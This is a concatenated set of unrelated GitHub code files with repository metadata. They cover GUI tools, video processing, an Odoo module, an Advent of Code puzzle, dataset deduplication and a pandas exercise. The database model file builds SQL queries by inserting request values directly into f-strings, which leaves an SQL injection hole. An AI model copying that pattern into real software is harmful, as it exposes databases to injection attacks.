'--db', help='Path to DB file', default='all_5_states_undecided_machines_with_global_header')\n ap.add_argument('seeds', help='DB seed numbers', type=int, nargs='+')\n args = ap.parse_args()\n\n for seed in args.seeds:\n machine = get_machine_i(args.db, seed)\n s = RewriteSystem(machine)\n w = GUI(s)\n DotWindow(widget=w).connect('delete-event', Gtk.main_quit)\n Gtk.main()\n","repo_name":"UncombedCoconut/bbchallenge","sub_path":"interactive.py","file_name":"interactive.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16602303745","text":"from os import getcwd\nfrom sys import path\ncwd = getcwd()\npath.append(cwd)\nfrom Task_1.main.ex_4 import cls_Testa_Circulo,cls_circulo\n\n\n\ndef test_cls_circulo():\n\tc = 1\n\tres = cls_circulo(c)\n\tres.mtd_Calcular_Area_Circulo()\n\tassert round(res.area,2) == 3.14\n\n","repo_name":"devscheffer/SenacRS-Algoritmos-Programacao-3","sub_path":"task_1/test/ex_4_test.py","file_name":"ex_4_test.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"454938624","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n\ndef colorHist(path):\n cap = cv2.VideoCapture(path)\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\n codec = cv2.VideoWriter_fourcc(*'mp4v')\n out = 
cv2.VideoWriter('./input/SuperCoilsEN/SuperCoilsEN11.mp4', codec, 30, (width, height))\n while cap.isOpened():\n ret, frame = cap.read()\n if ret:\n hist, bins = np.histogram(frame.flatten(), 256, [0, 256])\n\n cdf = hist.cumsum()\n cdf_normalized = cdf * hist.max() / cdf.max()\n\n cdf_m = np.ma.masked_equal(cdf, 0)\n cdf_m = (cdf_m - cdf_m.min()) * 255 / (cdf_m.max() - cdf_m.min())\n cdf = np.ma.filled(cdf_m, 0).astype('uint8')\n im = cdf[frame]\n\n f, axarr = plt.subplots(1, 2, figsize=(9, 3))\n\n axarr[0].hist(frame.flatten(), 256, [0, 256], color='r')\n axarr[0].set_xlim([0, 256])\n axarr[0].legend(('histogram'), loc='upper left')\n\n axarr[1].hist(im.flatten(), 256, [0, 256], color='r')\n axarr[1].set_xlim([0, 256])\n axarr[1].legend(('histogram'), loc='upper left')\n plt.show()\n out.write(im)\n else:\n out.release()\n cap.release()\n break\n\ncolorHist('./input/TheWinterGames_highBrightness.mp4')","repo_name":"plindhorst/video-shazam","sub_path":"code/colorHistNormalization.py","file_name":"colorHistNormalization.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2264294495","text":"#!/usr/local/bin/python3\nfrom subprocess import call\nimport shlex\nprint(\"Remember to call the function in the folder! (Limited functionality of ffmpeg)\")\nfilm_path = input(\"Enter film path: \")\nsub_path = input(\"Enter sutitle path: \")\nout_name = \"'SUB_\" + film_path + \"'\"\nfilm_path = \"'\" + film_path + \"'\"\nsub_path = \"'\" + sub_path + \"'\"\nout_name = 'SUB_' + film_path\ncommand = \"ffmpeg -i \" + film_path + \" -i \" + sub_path + \" -c:v copy -c:a copy -c:s mov_text -metadata:s:s:0 language=eng \" + out_name\ncommand = shlex.split(command)\ncall(command)\n","repo_name":"nickdurante/python_collection","sub_path":"Other/add_subtitles.py","file_name":"add_subtitles.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4877209687","text":"import TCP.tcpServer as Server\nimport TCP.config as Config\nimport DbManager.mysqlManager as DbManager\n\n\ndef main():\n node__d_logger = Config.make_logger(\"nodeD\")\n\n db_manager = DbManager.MysqlManager()\n db_manager.create_tables()\n server = Server.ThreadedServerTCP(Config.localhost, Config.node_D_PORT, Config.packer_format_node_D, node__d_logger, conn_address=None,conn_port=None, db_manager=db_manager)\n server.listen()\n\n\nmain()","repo_name":"astonished12/PCD","sub_path":"HW4/nodeD.py","file_name":"nodeD.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32359554407","text":"from odoo import api, models\n\n\nclass PaymentAcquirer(models.Model):\n _inherit = \"payment.acquirer\"\n\n @api.model\n def get_allowed_acquirers(self, acquirers, invoice_id=None, order_id=None):\n \"\"\"\n Get allowed acquirers by the customer\n :param list acquirers: list of acquirers\n :param int invoice_id: invoice id\n :param int order_id: quotation id\n :return list: List of allowed acquirers\n \"\"\"\n if order_id:\n model = \"sale.order\"\n rec_id = order_id\n elif invoice_id:\n model = \"account.move\"\n rec_id = invoice_id\n else:\n return acquirers\n record = self.env[model].sudo().browse(rec_id)\n customer_acquirers = record.partner_id.allowed_acquirer_ids\n return (\n list(set(acquirers) & set(customer_acquirers))\n if customer_acquirers\n else 
acquirers\n )\n","repo_name":"OCA/account-payment","sub_path":"partner_restrict_payment_acquirer/models/payment_acquirer.py","file_name":"payment_acquirer.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"18"} +{"seq_id":"22630375949","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import messagebox\n\nfrom .vista_crear import VistaCrear\n\n\nclass VistaInicio(tk.Frame):\n \"\"\"\n Pantalla inicial de la interfaz. Contiene dos frames de creación de\n autómatas pudiendo pasar de uno al otro mediante un combobox\n \"\"\"\n\n def __init__(self, master, controlador, num_automatas):\n super().__init__(master)\n self.controlador = controlador\n\n frame_navegacion = tk.LabelFrame(self)\n sel_automata = tk.Label(frame_navegacion, text='Autómata:')\n self.combobox_seleccion = ttk.Combobox(frame_navegacion,\n state='readonly')\n self.combobox_seleccion['values'] = ['Autómata ' + str(i + 1) for i in\n range(num_automatas)]\n self.combobox_seleccion.set('Autómata 1')\n self.combobox_seleccion.bind(\"<>\",\n self.cambiar_automata)\n\n sel_automata.grid(row=0, column=0, padx=5, pady=5)\n self.combobox_seleccion.grid(row=0, column=1)\n\n self.boton_simular = tk.Button(frame_navegacion,\n text='Simular autómata 1',\n command=self.simular_automata)\n self.boton_simular.grid(row=0, column=3, pady=5, padx=10, sticky='e')\n boton_comparar = tk.Button(frame_navegacion, text='Comparar autómatas',\n command=self.comparar_automatas)\n boton_comparar.grid(row=0, column=2, sticky='e')\n\n frame_navegacion.grid(row=0, column=0, padx=5, pady=5, sticky='nsew')\n frame_navegacion.grid_columnconfigure(2, weight=1)\n\n separator = ttk.Separator(self, orient='horizontal')\n separator.grid(row=1, column=0, pady=10, sticky='ew')\n\n self.vistas = []\n for i in range(num_automatas):\n self.vistas.append(VistaCrear(self, controlador, i))\n self.vista_actual = 0\n\n self.vistas[self.vista_actual].grid(row=2, column=0, sticky='nsew')\n\n self.grid_columnconfigure(0, weight=1)\n self.grid_rowconfigure(2, weight=1)\n\n def set_controlador(self, controlador):\n self.controlador = controlador\n self.vistas[0].set_controlador(controlador)\n self.vistas[1].set_controlador(controlador)\n\n def cambiar_automata(self, event):\n \"\"\"\n Cambia la vista entre los dos posibles autómatas a crear\n :param event:\n :return:\n \"\"\"\n if self.combobox_seleccion.get() == 'Autómata 1':\n self.vista_actual = 0\n self.boton_simular.configure(text='Simular autómata 1')\n else:\n self.vista_actual = 1\n self.boton_simular.configure(text='Simular autómata 2')\n\n self.vistas[(self.vista_actual + 1) % 2].grid_forget()\n self.vistas[self.vista_actual].grid(row=2, column=0, sticky='nsew')\n\n def simular_automata(self):\n \"\"\"\n Transmite al controlador que ha sido pulsado el botón simular si el\n autómata introducido es correcto\n :return:\n \"\"\"\n try:\n s_init = self.vistas[self.vista_actual].get_s_init()\n simbolo, matriz = self.vistas[\n self.vista_actual].get_transformacion()\n observable = self.vistas[self.vista_actual].get_observable()\n except SyntaxError:\n messagebox.showerror(message='Errores de sintaxis en el autómata')\n else:\n correcto = self.controlador.simular_automata(s_init, observable,\n simbolo, matriz,\n self.vista_actual)\n if not correcto:\n messagebox.showerror(message='El autómata no es correcto')\n\n def comparar_automatas(self):\n \"\"\"\n Transmite al controlador que ha sido pulsado el botón comparar si los\n 
dos autómatas de las vistas son correctos\n :return:\n \"\"\"\n try:\n s_init = self.vistas[0].get_s_init()\n simbolo, matriz = self.vistas[0].get_transformacion()\n observable = self.vistas[0].get_observable()\n\n s_init_2 = self.vistas[1].get_s_init()\n simbolo_2, matriz_2 = self.vistas[1].get_transformacion()\n observable_2 = self.vistas[1].get_observable()\n except SyntaxError:\n messagebox.showerror(\n message='Errores de sintaxis en alguno de los autómatas')\n else:\n correcto = self.controlador.comparar_automatas(s_init, simbolo,\n matriz, observable,\n s_init_2, simbolo_2,\n matriz_2,\n observable_2)\n if not correcto:\n messagebox.showerror(\n message='Los autómatas deben ser dos MOQFA correctos y tener el mismo alfabeto')\n\n def actualizar_automata(self, id_qfa, dim=None, tipo=None, s_init=None,\n simbolo=None, transformacion=None,\n observable=None, alfabeto=None):\n self.vistas[id_qfa].mostrar_automata(dim, tipo, s_init, simbolo,\n transformacion, observable,\n alfabeto)\n","repo_name":"javiegal/Simulador-QFA","sub_path":"vista/vista_inicio.py","file_name":"vista_inicio.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15536410000","text":"from tkinter import *\nfrom tkinter import ttk\n\nroot = Tk()\n\nname = Label(root, text = \"name: \")\nname.grid(row = 1, column = 1)\n\nnamebox = Entry(root)\nnamebox.grid(row = 1, column = 2, padx = 7)\n\nsex = Label(root, text = \"sex: \")\nsex.grid(row = 2, column = 1)\n\nsexframe = Frame(root)\nsexframe.grid(row = 2, column = 2, padx = 5, pady = 5)\n\nvarSex = IntVar()\nmalebutton = Radiobutton(sexframe, text = \"male\", variable = varSex, value = 1)\nfemalebutton = Radiobutton(sexframe, text = \"female\", variable = varSex, value = 0)\nmalebutton.grid(row = 1, column = 1)\nfemalebutton.grid(row = 1, column = 2)\n\nbirthday = Label(root, text = \"birthday: \" )\nbirthday.grid(row=3, column=1)\nbirthdayframe = Frame(root)\nbirthdayframe.grid(row = 3, column = 2)\n\nvarYear = IntVar()\nyear = ttk.Combobox(birthdayframe, textvariable = varYear, state = 'readonly', width = 4)\nyear['value'] = list(range(2017, 1900, -1))\nyear.set(\"년\")\nyear.grid(row = 1, column = 1)\n\nvarMonth = IntVar()\nmonth = ttk.Combobox(birthdayframe, textvariable = varMonth, state = 'readonly', width = 2)\nmonth['value'] = list(range(1, 13))\nmonth.set(\"월\")\nmonth.grid(row = 1, column = 3)\n\n\nvarDay = IntVar()\nday = ttk.Combobox(birthdayframe, textvariable = varDay, state = 'readonly', width = 2)\nday['value'] = list(range(1, 32))\nday.set(\"월\")\nday.grid(row = 1, column = 5)\n\nyearlabel = Label(birthdayframe, text= '년')\nyearlabel.grid(row = 1, column=2)\nmonthlabel = Label(birthdayframe, text= '월')\nmonthlabel.grid(row = 1, column=4)\ndaylabel = Label(birthdayframe, text= '일')\ndaylabel.grid(row = 1, column=6)\n\nemail = Label(root, text = \"Email\")\nemail.grid(row = 4, column = 1)\n\nemailAddress = Entry(root)\nemailAddress.grid(row = 4, column = 2, padx = 7)\n\nat = Label(root, text = \"@\")\nat.grid(row = 4, column = 3)\n\ndomain = Entry(root)\ndomain.grid(row = 4, column = 4, padx = 7)\n\nlanguage = Label(root)\nlanguage.grid(row = 5, column = 1)\n\nlanguageframe = Frame(root)\nlanguageframe.grid(row = 5, column = 
2)\n\n\n\n\n\nroot.mainloop()\n","repo_name":"wonkim0512/BDP","sub_path":"lectures/new/20more.py","file_name":"20more.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74195414120","text":"from functools import reduce\nimport fileinput\n\n\ndef process_position(grid, x, y):\n position_type = grid[x][y]\n if position_type == '.':\n return '.'\n # part 1\n # neighbours = [grid[i][j] for i in range(max(0, x-1), min(len(grid), x+2))\n # for j in range(max(0, y-1), min(len(grid[0]), y+2)) if i != x or j != y]\n\n # part 2\n neighbours = []\n steppers = {\n 'l': lambda i, j: (i, j-1),\n 'r': lambda i, j: (i, j+1),\n 'u': lambda i, j: (i+1, j),\n 'd': lambda i, j: (i-1, j),\n 'ur': lambda i, j: (i+1, j+1),\n 'ul': lambda i, j: (i+1, j-1),\n 'dr': lambda i, j: (i-1, j+1),\n 'dl': lambda i, j: (i-1, j-1)\n }\n for d in steppers.values():\n pos_x, pos_y = d(x, y)\n while (0 <= pos_x < len(grid)) and (0 <= pos_y < len(grid[0])):\n if grid[pos_x][pos_y] != '.':\n neighbours.append(grid[pos_x][pos_y])\n break\n else:\n pos_x, pos_y = d(pos_x, pos_y)\n occupied_neighbours = reduce(\n lambda acc, curr: acc+1 if curr == '#' else acc, neighbours, 0)\n if position_type == 'L':\n return 'L' if occupied_neighbours > 0 else '#'\n if position_type == '#':\n # part 1\n # return '#' if occupied_neighbours < 4 else 'L'\n\n # part 2\n return '#' if occupied_neighbours < 5 else 'L'\n\n\ndef are_grids_equal(grid_1, grid_2):\n return all(map(lambda i: grid_1[i] == grid_2[i], range(len(grid_1))))\n\n\ndef simulate_step(grid):\n grid_height = len(grid)\n grid_width = len(grid[0])\n new_grid = list(map(lambda _: [''] * grid_width, [''] * grid_height))\n for i, row in enumerate(grid):\n for j, col in enumerate(row):\n new_grid[i][j] = process_position(grid, i, j)\n return new_grid\n\n\ndef count_occupied(grid):\n cnt = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == '#':\n cnt += 1\n return cnt\n\n\ngrid = list(map(lambda x: list(x.rstrip()), fileinput.input()))\nwhile True:\n new_grid = simulate_step(grid)\n if are_grids_equal(grid, new_grid):\n print(count_occupied(grid))\n break\n else:\n grid = new_grid\n","repo_name":"jakipatryk/aoc-2020","sub_path":"11/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7988087860","text":"\"\"\"\r\nAnalyse duplicates in a dataset.\r\nConsider near and exact matching.\r\n\"\"\"\r\nimport sys\r\nimport csv\r\nimport ast\r\nimport gzip\r\nimport subprocess\r\nimport pandas as pd\r\nfrom dq_analysis.datasets.data import Data\r\nfrom ast import literal_eval\r\n\r\nif len(sys.argv) < 2:\r\n print(\"Usage: python dq_analysis/attributes/uniqueness.py [prepare/measure] \")\r\n exit()\r\n\r\n\r\ndef identify_duplicates(dataset):\r\n \"\"\"\r\n Identify near duplicates using the duplicate code detector tool\r\n from Allamanis (2018)\r\n\r\n IMPORTANT: Requires tokens to be generated first via currency preparation\r\n \"\"\"\r\n\r\n csv.field_size_limit(100000000)\r\n headers = []\r\n data = []\r\n\r\n # Process tokenized files\r\n for row in csv.reader(open(f'dq_analysis/datasets/{dataset}/tokens.csv')):\r\n if not headers:\r\n headers = row\r\n else:\r\n entries = [a[0] for a in ast.literal_eval(row[3])]\r\n data.append( [row[1], entries])\r\n df = pd.DataFrame(data, columns=['filename','tokens'])\r\n\r\n # Output in 
JSONL format\r\n df.to_json(f'dq_analysis/datasets/{dataset}/tokens.jsonl', orient='records', lines=True)\r\n # Output in GZIP format\r\n with open(f'dq_analysis/datasets/{dataset}/tokens.jsonl', 'rb') as src, gzip.open(f'dq_analysis/datasets/{dataset}/tokens.jsonl.gz', 'wb') as dst:\r\n dst.writelines(src)\r\n\r\n # Run duplicate detector tool\r\n p = subprocess.Popen(f\"dotnet run DuplicateCodeDetector.csproj --dir=../../dq_analysis/datasets/{dataset}/tokens.jsonl.gz\",\r\n cwd='near-duplicate-code-detector/DuplicateCodeDetector/', shell=True)\r\n p.wait()\r\n\r\n # Move the output\r\n p = subprocess.Popen(f\"mv near-duplicate-code-detector/DuplicateCodeDetector/DuplicateCodeDetector.csproj.json dq_analysis/datasets/{dataset}/unique_clusters.csv\", shell=True)\r\n p.wait()\r\n\r\n\r\ndef get_duplicate_clusters(dataset, type=3):\r\n \"\"\"\r\n Return the within-class fuzzy duplicates of a dataset,\r\n using similarity matching.\r\n \"\"\"\r\n\r\n # Load the data\r\n data = Data(dataset).get_dataset()\r\n vuln = data[data.Vulnerable == 1].UID.tolist()\r\n nonvuln = data[data.Vulnerable == 0].UID.tolist()\r\n\r\n # Read near duplicate matching output\r\n if type == 1:\r\n duplicates = open(f'dq_analysis/datasets/{dataset}/consistent_clusters.csv')\r\n clusters = literal_eval(duplicates.read())\r\n elif type == 3:\r\n duplicates = open(f'dq_analysis/datasets/{dataset}/unique_clusters.csv')\r\n clusters = literal_eval(duplicates.read())\r\n class_clusters = []\r\n # Split clusters by class\r\n for x in clusters:\r\n cluster0, cluster1 = [], []\r\n for id in x:\r\n if int(id) in nonvuln:\r\n cluster0.append(int(id))\r\n if int(id) in vuln:\r\n cluster1.append(int(id))\r\n if len(cluster0) > 1:\r\n class_clusters.append(cluster0)\r\n if len(cluster1) > 1:\r\n class_clusters.append(cluster1)\r\n return class_clusters\r\n\r\n\r\ndef count_near_unique(dataset, type):\r\n \"\"\"\r\n Count number of unique files using near duplicate matching,\r\n performed using the Jacquard Index and implemented via Allamanis (2018)\r\n \"\"\"\r\n print('-'*3 + dataset + ' Type ' + str(type) + '-'*3)\r\n df = Data(dataset).get_dataset()\r\n # Get duplicates\r\n class_clusters = get_duplicate_clusters(dataset, type)\r\n duplicates = [int(y) for x in class_clusters for y in x[1:]]\r\n # Get unique\r\n unique = df[~df.UID.isin(duplicates)]\r\n unique = unique.dropna()\r\n num_unique = len(unique)\r\n\r\n print(f\"NEAR unique: {num_unique} / {len(df)}\")\r\n print(f\"{dataset} Uniqueness = {num_unique / len(df)}\")\r\n\r\n\r\nif __name__ == '__main__':\r\n if sys.argv[1] == 'prepare':\r\n identify_duplicates(sys.argv[2])\r\n elif sys.argv[1] == 'measure':\r\n count_near_unique(sys.argv[2])\r\n else:\r\n print(f\"ERROR: Unknown command line argument: \\\"{sys.argv[1]}\\\"\")\r\n","repo_name":"RolandCroft/Software-Vulnerability-Data-Quality","sub_path":"dq_analysis/attributes/uniqueness.py","file_name":"uniqueness.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"3250602437","text":"from database.db import get_connection\nfrom .entities.SetupBodyOrgans import SetupBodyOrgans\n\nclass SetupBodyOrgansModel():\n\n @classmethod\n def get_SetupBodyOrgans(self):\n try:\n connection = get_connection()\n setupbodyorgans = []\n\n with connection.cursor() as cursor:\n textSQL = \"\"\"\n SELECT idsetupbodyorgans, setupbodyorgans.idsetupsystems, setupsystems.setupsystems, bodyorgans, \"Left\", \"Right\", \n men, womman, 
setupbodyorgans.rangemax, setupbodyorgans.rangemin, setupbodyorgans.lenguage, setupbodyorgans.importance_level\n FROM setupbodyorgans\n LEFT JOIN setupsystems on setupsystems.idsetupsystems = setupbodyorgans.idsetupsystems;\n \"\"\"\n cursor.execute(textSQL)\n resultset = cursor.fetchall()\n\n for row in resultset:\n setupbodyorgansx = SetupBodyOrgans(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9], row[10], row[11])\n setupbodyorgans.append(setupbodyorgansx.to_JSON())\n\n connection.close()\n return setupbodyorgans\n\n except Exception as ex:\n raise Exception(ex)\n \n @classmethod\n def get_SetupBodyOrgan(self, id):\n try:\n connection = get_connection()\n\n with connection.cursor() as cursor:\n textSQL = f\"\"\"\n SELECT idsetupbodyorgans, idsetupsystems, bodyorgans, \"Left\", \"Right\", \n men, womman, rangemax, rangemin, lenguage\n\t FROM setupbodyorgans\n WHERE idsetupbodyorgans = {id};\n \"\"\"\n cursor.execute(textSQL)\n row = cursor.fetchone()\n setupbodyorgans = None\n\n if row != None:\n setupbodyorgansx = SetupBodyOrgans(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9])\n setupbodyorgans = setupbodyorgansx.to_JSON()\n\n connection.close()\n return setupbodyorgans\n\n except Exception as ex:\n raise Exception(ex)\n \n @classmethod\n def add_SetupBodyOrgan(self, IDSetupBodyOrgans, IDSetupSystems, BodyOrgans, Left, Right, Men, Womman, RangeMax, RangeMin, Lenguage, importance_level):\n try:\n connection = get_connection()\n\n with connection.cursor() as cursor:\n textSQL = f\"\"\"\n INSERT INTO setupbodyorgans(\n idsetupbodyorgans, idsetupsystems, bodyorgans, \"Left\", \"Right\", \n men, womman, rangemax, rangemin, lenguage, importance_level)\n VALUES ({IDSetupBodyOrgans}, {IDSetupSystems}, '{BodyOrgans}', CAST({Left} AS bit), CAST({Right} AS bit), \n CAST({Men} AS bit), CAST({Womman} AS bit), {RangeMax}, {RangeMin}, '{Lenguage}', '{importance_level}');\n \"\"\"\n cursor.execute(textSQL)\n affected_rows = cursor.rowcount\n connection.commit()\n connection.close()\n return affected_rows\n except Exception as ex:\n raise Exception(ex)\n \n @classmethod\n def update_SetupBodyOrgan(self, IDSetupBodyOrgans, IDSetupSystems, BodyOrgans, Left, Right, Men, Womman, RangeMax, RangeMin, Lenguage, importance_level):\n try:\n connection = get_connection()\n\n with connection.cursor() as cursor:\n textSQL = f\"\"\"\n UPDATE setupbodyorgans\n SET idsetupsystems={IDSetupSystems}, bodyorgans='{BodyOrgans}', \"Left\"=CAST({Left} AS bit), \"Right\"=CAST({Right} AS bit), \n men=CAST({Men} AS bit), womman=CAST({Womman} AS bit), rangemax={RangeMax}, rangemin={RangeMin}, lenguage='{Lenguage}', importance_level='{importance_level}'\n WHERE idsetupbodyorgans = {IDSetupBodyOrgans};\n \"\"\"\n cursor.execute(textSQL)\n affected_rows = cursor.rowcount\n connection.commit()\n connection.close()\n return affected_rows\n except Exception as ex:\n raise Exception(ex)","repo_name":"MiguelCarcamo/IridologyApiRest","sub_path":"models/SetupBodyOrgansModel.py","file_name":"SetupBodyOrgansModel.py","file_ext":"py","file_size_in_byte":4319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"32499324698","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 13 18:53:21 2020\n\n@author: lthompson8\n\"\"\"\n\n#%%\n#1. Use Pandas to repeat the Exercise 5.7.\n#Hint 1: Use pd.read_csv(url, ...) 
to read the USGS online gauge data.\n\nimport pandas as pd\nimport os\n\nurl = \"https://waterdata.usgs.gov/nwis/dv?&cb_00060=on&format=rdb&site_no=06803495&site_no=06803486&referred_module=sw&period=&begin_date=2000-10-01&end_date=2019-09-30\"\n#df = pd.read_csv(url, skiprows=range(0,28), sep='\\n')\ndf = pd.read_csv(url, skiprows=29, delimiter='\\t', header=0, names=['org','gage','date','flow','estimate'])\nprint(df)\ndirPath = r'C:\\Users\\lthompson8\\python2020summer\\LauraThompson\\Exercise7'\nfileName = 'USGS_Streamflow_Data.csv'\nfullPath = os.path.join(dirPath, fileName)\nprint(fullPath)\n\ndf.to_csv(fullPath, index=False)\n#Hint 2: Use df.set_index() to set the datetime column and df.resample() to calculate the monthly and annual statistics\n\ndf['date']= pd.to_datetime(df['date'], errors='coerce')\nprint(df)\ndf.info()\ndf = df.set_index(['date'])\n\n#change flow to numeric type\ndf['flow'] = pd.to_numeric(df['flow'], errors='coerce')\ndf.info()\n\n#create empty dataframe for monthly stats to go into\nMonthlyStats = pd.DataFrame(columns=['Min','Max','Mean'])\nprint(MonthlyStats)\n#put data in! \"M\" resamples by Month\n#use following code if you want to go across both gages.\n#MonthlyStats.Min = df.flow.resample('M').min()\n#MonthlyStats.Max = df.flow.resample('M').max()\n#MonthlyStats.Mean = df.flow.resample('M').mean()\n\n#can also do this by gage if desired using code below, but instructions seem like we should average across gages.\ndf['gage'] = pd.to_numeric(df['gage'], errors='coerce')\nMonthlyStats.Min = df.flow.groupby(df['gage']).resample('M').min()\nMonthlyStats.Max = df.flow.groupby(df['gage']).resample('M').max()\nMonthlyStats.Mean = df.flow.groupby(df['gage']).resample('M').mean()\n\n\nfileName = 'MonthlyStreamflowStats.csv'\nfullPath = os.path.join(dirPath, fileName)\nprint(fullPath)\nMonthlyStats.to_csv(fullPath, float_format='%.2f')\n#4) calculate the average annual runoff of each gage (expressed in acre-feet)\n#Hint 7: for the average annual runoff, you need to calculate the total runoff for each year and then calculate average of these annual runoff.\n#create empty dataframe for yearly total\nYearlyTotal = pd.DataFrame(columns=['AcreFeet'])\n#convert to acre-feet\ndf['AcreFeetPerDay'] = df['flow']*1.98347\n#resample by year with \"Y\" and include groupby to create separate for each gage.\n\ndf['gage'] = pd.to_numeric(df['gage'], errors='coerce')\ndf.info()\nYearlyTotal.AcreFeet = df.AcreFeetPerDay.groupby(df['gage']).resample('Y').sum()\nYearlyTotal\n \nfileName = 'AnnualAcreFeet.csv'\nfullPath = os.path.join(dirPath, fileName)\nprint(fullPath)\nYearlyTotal.to_csv(fullPath, float_format='%.2f')\n\n\n#%%\n#2. 
Use Pandas to:\n#2.1 Read data in data/users.zip (using Pandas' the on-the-fly decompression cabability)\nimport pandas as pd\nimport os\nuserdata = pd.read_csv('C:/Users/lthompson8/python2020summer/LauraThompson/users.zip', sep='|')\nuserdata = userdata.set_index('user_id')\nuserdata.info()\nprint(userdata)\n#2.2 Identify all the occupations and compare the user numbers between STEM-related occupations and non-STEM occupations.\n#first idenfity the occupations that are considered STEM.\n#view all occupations with pivot table\nuserdata.pivot_table(index='occupation', aggfunc=['min','max','mean','std'])\n\n#for total number of stem careers:\nstem_careers = ('engineer', \"programmer\", \"scientist\", \"technician\", \"doctor\")\nprint(stem_careers)\n # create empty stem total list\nstem_careers_total = 0\nfor item in stem_careers:\n num = len(userdata[userdata[\"occupation\"] == item])\n print(f'{item} = {num}')\n stem_careers_total += num\n\n#for total number of non-stem careers:\nnon_stem_careers = ('administrator', 'artist', 'educator', 'entertainment', 'executive', 'healthcare', 'homemaker', 'lawyer', 'librarian', 'marketing', 'none', 'other', 'retired', 'salesman', 'student', 'writer')\nnon_stem_careers_total = 0\nfor item in non_stem_careers:\n num = len(userdata[userdata[\"occupation\"] == item])\n print(f'{item} = {num}')\n non_stem_careers_total += num\n\n#to get total remaining careers (across career), will sum the total number of users, then subtract the non stem\ntotalall = len(userdata.index)\n\nprint('Total users is = ', totalall)\nprint('Total STEM users is = ', stem_careers_total)\nprint('Total non-STEM users is = ', non_stem_careers_total)\n\n#2.3 Identify the locations of the users that are programmers and above 35. \nuserdata.info()\nprogrammers = userdata.query('occupation == \"programmer\"')\nprogrammersunder35 = programmers.query('age < 35')\nprogrammersunder35location = (programmersunder35.zip_code)\nprint(f\"zip code locations of programmers under 35 = {programmersunder35location}\")\nyoungprogrammerslocation = userdata.query('occupation == \"programmer\" & age < 35').groupby(['zip_code'])['zip_code'].count()\nprint(youngprogrammerslocation)\n\n#2.4 How many male and female programmers, respectively? 
\nprogrammergender = programmers.query('occupation == \"programmer\"').groupby(programmers['gender']).count()\nprint(programmergender)\nmaleprogrammers = programmergender['gender']['M']\nfemaleprogrammers = programmergender['gender']['F']\nprint(f\"The number of male programmers is {maleprogrammers} and number of female programmers is {femaleprogrammers}\")\n\n#2.5 Is this ratio the same for the age under 35?\n#split previous by under 35 and greater or equal to 35.\nprint(programmers)\nprogrammers.info()\nyoungprogrammers = programmers.query('occupation == \"programmer\" & age < 35').groupby(programmers['gender']).count()\nyoungmaleprogrammers = youngprogrammers['gender']['M']\nyoungfemaleprogrammers = youngprogrammers['gender']['F']\nprint(f\"The number of male programmers under 35 is {youngmaleprogrammers} and the number of female programmers under 35 is {youngfemaleprogrammers}.\")\nratioyoungprogrammers = f'{youngmaleprogrammers/youngfemaleprogrammers:.2f}'\nprint(f\"The ratio of male to female programmers in the under 35 group is {ratioyoungprogrammers}.\")\n\nolderprogrammersgender = programmers.query('age >= 35').groupby(programmers['gender']).count()\noldermaleprogrammers = olderprogrammersgender['gender']['M']\nolderfemaleprogrammers = olderprogrammersgender['gender']['F']\nprint(f\"The number of male programmers over 35 is {oldermaleprogrammers} and the number of female programmers over 35 is {olderfemaleprogrammers}.\")\nratioolderprogrammers = f'{oldermaleprogrammers/olderfemaleprogrammers:.2f}'\nprint(f\"The ratio of male to female programmers in the 35 and over group is {ratioolderprogrammers}.\")\n\n#2.6 Compare the numbers of male and female for each occupations\noccupationstatsbygender = userdata.groupby(['occupation', 'gender'])['gender'].count()\nprint(occupationstatsbygender)\n\n#2.7 Find the occupations with the youngest and oldest mean ages, respectively\n\n#find mean ages first\nmeanages = userdata.groupby(['occupation'])['age'].mean()\n#sort\nprint(meanages.sort_values().round(decimals=2))\n#find youngest\nyoungestoccupation = meanages.idxmin()\nprint(f'{youngestoccupation} is the occupation with the youngest mean age with a mean age of {meanages.min():.1f} years')\n#find oldest\noldestoccupation = meanages.idxmax()\nprint(f'{oldestoccupation} is the occupation with the youngest mean age with a mean age of {meanages.max():.1f} years')\n\n#2.8 Based on the first two digits of the zip codes, find the area with the largest number of users\n#shorten zipcode \nuserdata['shortzip'] = userdata['zip_code'].str[:2]\nuserdata.info()\nusersbyregion = userdata.groupby(['shortzip'])['occupation'].count()\nmaxuserszip = usersbyregion.idxmax()\nprint(f\"The largest number of users is in the zip code prefix {maxuserszip}.\")\n\n\n\n#userdata.pivot_table(values='age', index='occupation', columns='gender', 